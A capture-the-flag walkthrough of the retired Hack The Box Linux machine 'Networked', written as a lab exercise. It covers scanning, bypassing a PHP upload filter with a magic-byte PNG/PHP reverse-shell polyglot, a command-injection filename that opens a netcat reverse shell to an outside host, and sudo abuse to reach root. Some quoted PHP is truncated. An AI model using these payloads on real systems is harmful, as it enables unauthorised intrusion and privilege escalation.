Name: | Networked ![]() |
---|---|
Release Date: | 24 Aug 2018 |
Retire Date: | 16 Nov 2019 |
OS: | Linux ![]() |
Base Points: | Easy - Retired [0] |
Rated Difficulty: | ![]() |
Radar Graph: | ![]() |
![]() |
opt1kz ![]() |
![]() |
deimos ![]() |
Creator: | guly ![]() |
CherryTree File: | CherryTree - Remove the .txt extension |
Again, we start with nmap -sC -sV -oA ./networked 10.10.10.146
$ nmap -sC -sV -Pn -oA ./networked 10.10.10.146
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 11:20 EDT
Nmap scan report for 10.10.10.146
Host is up (0.064s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.21 seconds
So, we are dealing with SSH, HTTP and HTTPS. HTTP has a short plaintext message on it.
Hello mate, we're building the new FaceMash!
Help by funding us and be the new Tyler&Cameron!
Join us at the pool party this Sat to get a glimpse
HTTPS cannot connect (even after adding networked.htb to the /etc/hosts file). Let's fire up gobuster and get it working.
gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.146
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.146
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/04/08 11:24:33 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/backup (Status: 301)
/cgi-bin/ (Status: 403)
/uploads (Status: 301)
===============================================================
2020/04/08 11:26:40 Finished
===============================================================
Uploads looks blank and Backup has a tar file that we can download and expand. Digging through each of the files, we
can see there is a file type checker that it using magic bytes as the method of filtering. We should be able to add
the magic byte types for an image, but actually upload a webshell.
In the upload.php file:
if (!(check_file_type($_FILES[ "myFile" ]) && filesize($_FILES[ 'myFile' ][ 'tmp_name' ])Invalid image file.
' ;
displayform();
}
In the lib.php file:
function check_file_type ($file) {
$mime_type = file_mime_type($file);
if (strpos($mime_type, 'image/' ) === 0 ) {
return true ;
} else {
return false ;
}
}
if (function_exists( 'mime_content_type' ))
{
$file_type = @mime_content_type($file[ 'tmp_name' ]);
if (strlen($file_type) > 0 ) {
return $file_type;
}
}
list ($foo,$ext) = getnameUpload($myFile[ "name" ]);
$validext = array ( '.jpg' , '.png' , '.gif' , '.jpeg' );
$valid = false ;
foreach ($validext as $vext) {
if (substr_compare($myFile[ "name" ], $vext, -strlen($vext)) === 0 ) {
$valid = true ;
}
}
$name = str_replace( '.' , '_' ,$_SERVER[ 'REMOTE_ADDR' ]). '.' .$ext;
It looks like it is filtering by file extension too. So, uploading the PHP-Reverse-Shell from Pentest Monkey would fail
immediately. We can add the magic bytes to identify the file as a PNG
echo '89 50 4E 47 0D 0A 1A 0A' | xxd -p -r > networkshell.php.png
cat ./php-reverse-shell.php >> networkshell.php.png
That will add the magic bytes and add Pentest Monkey's php-reverse-shell.php after it. Upload it to uploads.php, start
a netcat listener at your chosen port, and navigate to /photos.php. Congrats! You have a foothold as apache. Onward
and upward! As in escalation. Wget isn't on this machine so LinEnum.sh is pretty much out. However, we can navigate
to the user guly's folder. In that folder, besides the user.txt file that we can't read yet, is a check_attack.php file
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";
$files = array();
$files = preg_grep('/^([^.])/', scandir($path));
foreach ($files as $key => $value) {
$msg='';
if ($value == 'index.html') {
continue;
}
#echo "-------------\n";
#print "check: $value\n";
list ($name,$ext) = getnameCheck($value);
$check = check_ip($name,$value);
if (!($check[0])) {
echo "attack!\n";
# todo: attach file
file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
mail($to, $msg, $msg, $headers, "-F$value");
}
}
?>
It looks like this script is checking for invalid files and purging them using that exec/nohup command. We should be able to subvert this to our needs by changing if from /bin/rm -f to a command. So, here's what we need to do.
cd /var/www/html/uploads
touch ';nc 10.10.14.27 4444 -c bash'
Now start a netcat listener on 4444 and wait. Guly shell. Sudo -l tells us that guly can execute changename.sh without a password.
[guly@networked ~]$ sudo -l
sudo -l
Matching Defaults entries for guly on networked:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User guly may run the following commands on networked:
(root) NOPASSWD: /usr/local/sbin/changename.sh
If we look at the changename.sh, we find:
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly > /etc/sysconfig/network-scripts/ifcfg-guly
done
/sbin/ifup guly0
This script looks like it is configuring NIC interfaces. We should be able to execute /bin/bash as root by entering anything /bin/bash in the first arg statement. I just used a generic "abc /bin/bash".